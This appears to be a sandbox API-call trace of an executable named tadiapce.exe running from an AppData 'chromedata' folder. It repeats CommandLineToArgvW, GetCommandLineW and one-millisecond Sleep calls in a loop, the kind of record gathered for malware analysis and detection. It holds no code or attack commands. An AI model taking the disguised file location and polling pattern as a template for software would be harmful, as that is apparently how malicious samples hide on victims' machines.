	[0065.536] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6b00*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.536] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.536] Sleep (dwMilliseconds=0x1) 
	[0065.552] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6b90*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.552] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.552] Sleep (dwMilliseconds=0x1) 
	[0065.567] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6c20*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.567] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.567] Sleep (dwMilliseconds=0x1) 
	[0065.584] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6d30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.584] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.584] Sleep (dwMilliseconds=0x1) 
	[0065.599] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6dc0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.599] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.599] Sleep (dwMilliseconds=0x1) 
	[0065.614] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6e50*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.614] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.614] Sleep (dwMilliseconds=0x1) 
	[0065.630] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6ee0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.630] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.630] Sleep (dwMilliseconds=0x1) 
	[0065.645] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b6f70*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.645] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.645] Sleep (dwMilliseconds=0x1) 
	[0065.661] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7000*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.661] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.661] Sleep (dwMilliseconds=0x1) 
	[0065.677] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7090*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.677] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.677] Sleep (dwMilliseconds=0x1) 
	[0065.693] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7120*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.693] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.693] Sleep (dwMilliseconds=0x1) 
	[0065.719] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b71b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.719] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.719] Sleep (dwMilliseconds=0x1) 
	[0065.723] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7240*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.723] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.723] Sleep (dwMilliseconds=0x1) 
	[0065.739] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b72d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.739] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.739] Sleep (dwMilliseconds=0x1) 
	[0065.755] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7360*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.755] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.755] Sleep (dwMilliseconds=0x1) 
	[0065.770] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b73f0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.770] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.770] Sleep (dwMilliseconds=0x1) 
	[0065.786] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7480*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.786] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.786] Sleep (dwMilliseconds=0x1) 
	[0065.802] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7510*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.802] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.802] Sleep (dwMilliseconds=0x1) 
	[0065.817] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b75a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.817] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.817] Sleep (dwMilliseconds=0x1) 
	[0065.833] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7630*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.833] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.833] Sleep (dwMilliseconds=0x1) 
	[0065.848] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b76c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.848] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.848] Sleep (dwMilliseconds=0x1) 
	[0065.865] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7750*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.865] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.865] Sleep (dwMilliseconds=0x1) 
	[0065.879] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b77e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.879] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.879] Sleep (dwMilliseconds=0x1) 
	[0065.895] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7870*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.895] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.895] Sleep (dwMilliseconds=0x1) 
	[0065.910] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7900*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.911] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.911] Sleep (dwMilliseconds=0x1) 
	[0065.927] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7990*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.927] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.927] Sleep (dwMilliseconds=0x1) 
	[0065.942] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7a20*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.942] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.942] Sleep (dwMilliseconds=0x1) 
	[0065.958] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7ab0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.958] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.958] Sleep (dwMilliseconds=0x1) 
	[0065.973] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7b40*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.973] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.973] Sleep (dwMilliseconds=0x1) 
	[0065.991] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7bd0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0065.991] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0065.991] Sleep (dwMilliseconds=0x1) 
	[0066.004] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7c60*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.004] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.004] Sleep (dwMilliseconds=0x1) 
	[0066.020] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7cf0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.020] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.020] Sleep (dwMilliseconds=0x1) 
	[0066.036] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7d80*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.036] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.036] Sleep (dwMilliseconds=0x1) 
	[0066.051] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7e10*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.051] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.051] Sleep (dwMilliseconds=0x1) 
	[0066.066] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7ea0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.067] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.067] Sleep (dwMilliseconds=0x1) 
	[0066.082] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7f30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.082] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.082] Sleep (dwMilliseconds=0x1) 
	[0066.098] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b7fc0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.098] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.098] Sleep (dwMilliseconds=0x1) 
	[0066.114] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8050*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.114] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.114] Sleep (dwMilliseconds=0x1) 
	[0066.129] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b80e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.129] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.129] Sleep (dwMilliseconds=0x1) 
	[0066.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8170*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.145] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.145] Sleep (dwMilliseconds=0x1) 
	[0066.160] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8200*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.160] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.160] Sleep (dwMilliseconds=0x1) 
	[0066.177] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8290*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.177] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.177] Sleep (dwMilliseconds=0x1) 
	[0066.202] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8320*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.202] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.202] Sleep (dwMilliseconds=0x1) 
	[0066.228] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b83b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.228] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.228] Sleep (dwMilliseconds=0x1) 
	[0066.238] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8440*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.238] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.238] Sleep (dwMilliseconds=0x1) 
	[0066.254] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b84d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.254] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.254] Sleep (dwMilliseconds=0x1) 
	[0066.270] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8560*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.270] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.270] Sleep (dwMilliseconds=0x1) 
	[0066.285] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b85f0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.285] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.285] Sleep (dwMilliseconds=0x1) 
	[0066.301] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8680*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.301] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.301] Sleep (dwMilliseconds=0x1) 
	[0066.316] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8710*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.316] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.316] Sleep (dwMilliseconds=0x1) 
	[0066.332] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b87a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.332] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.332] Sleep (dwMilliseconds=0x1) 
	[0066.347] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8830*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.347] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.347] Sleep (dwMilliseconds=0x1) 
	[0066.363] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b88c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.363] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.363] Sleep (dwMilliseconds=0x1) 
	[0066.379] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8950*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.379] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.379] Sleep (dwMilliseconds=0x1) 
	[0066.394] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b89e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.394] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.394] Sleep (dwMilliseconds=0x1) 
	[0066.410] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8a70*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.410] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.410] Sleep (dwMilliseconds=0x1) 
